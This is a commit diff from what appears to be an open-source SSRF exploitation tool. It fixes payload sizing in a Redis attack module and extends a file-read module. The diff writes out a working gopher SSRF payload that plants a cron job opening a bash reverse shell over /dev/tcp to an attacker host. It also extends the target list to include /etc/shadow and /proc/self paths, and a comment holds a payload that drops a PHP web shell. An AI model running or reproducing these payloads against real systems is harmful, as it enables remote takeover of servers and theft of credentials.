BUGFIX - Payload size in Redis module

pull/18/head
Swissky 2019-07-07 23:39:13 +02:00
parent 7ec9a6b1d0
commit 12c13aa2f2
3 changed files with 13 additions and 3 deletions

View File

@ -322,6 +322,7 @@
2222
9071
8899
8888
6005
9876
1501

View File

@ -8,7 +8,7 @@ author = "Swissky"
documentation = []
class exploit():
files = ["/etc/passwd", "/etc/lsb-release", "/etc/shadow", "/etc/hosts", "\/\/etc/passwd"]
files = ["/etc/passwd", "/etc/lsb-release", "/etc/shadow", "/etc/hosts", "\/\/etc/passwd", "/proc/self/environ", "/proc/self/cmdline", "/proc/self/cwd/index.php", "/proc/self/cwd/application.py", "/proc/self/cwd/main.py", "/proc/self/exe"]
def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name))

View File

@ -12,6 +12,7 @@ documentation = [
class exploit():
SERVER_HOST = "127.0.0.1"
SERVER_PORT = "4242"
SERVER_CRON = "/var/lib/redis"
def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name))
@ -23,6 +24,11 @@ class exploit():
if args.lport == None: self.SERVER_PORT = input("Server Port:")
else: self.SERVER_PORT = args.lport
self.SERVER_CRON = input("Server Cron (e.g:/var/spool/cron/):")
self.LENGTH_PAYLOAD = 65 - len("SERVER_HOST") - len("SERVER_PORT")
self.LENGTH_PAYLOAD = self.LENGTH_PAYLOAD + len(str(self.SERVER_HOST))
self.LENGTH_PAYLOAD = self.LENGTH_PAYLOAD + len(str(self.SERVER_PORT))
# Using a generator to create the host list
# Edit the following ip if you need to target something else
gen_host = gen_ip_list("127.0.0.1", args.level)
@ -30,18 +36,21 @@ class exploit():
# Data and port for the service
port = "6379"
data = "*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1%20*%20*%20*%20*%20bash%20-i%20>&%20/dev/tcp/SERVER_HOST/SERVER_PORT%200>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a"
data = "*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$LENGTH_PAYLOAD%0d%0a%0d%0a%0a%0a*/1%20*%20*%20*%20*%20bash%20-i%20>&%20/dev/tcp/SERVER_HOST/SERVER_PORT%200>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0aSERVER_CRON%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a"
payload = wrapper_gopher(data, ip , port)
# Handle args for reverse shell
payload = payload.replace("SERVER_HOST", self.SERVER_HOST)
payload = payload.replace("SERVER_PORT", self.SERVER_PORT)
payload = payload.replace("SERVER_CRON", self.SERVER_CRON)
payload = payload.replace("LENGTH_PAYLOAD", str(self.LENGTH_PAYLOAD))
# Send the payload
r = requester.do_request(args.param, payload)
"""
TODO:
command exec via php file
This exploit only works if you have control over a cron file.
Command execution via PHP file is not implemented, a simple example is the following.
gopher://127.0.0.1:6379/_FLUSHALL%0D%0ASET%20myshell%20%22%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%3F%3E%22%0D%0ACONFIG%20SET%20DIR%20%2fwww%2f%0D%0ACONFIG%20SET%20DBFILENAME%20shell.php%0D%0ASAVE%0D%0AQUIT
"""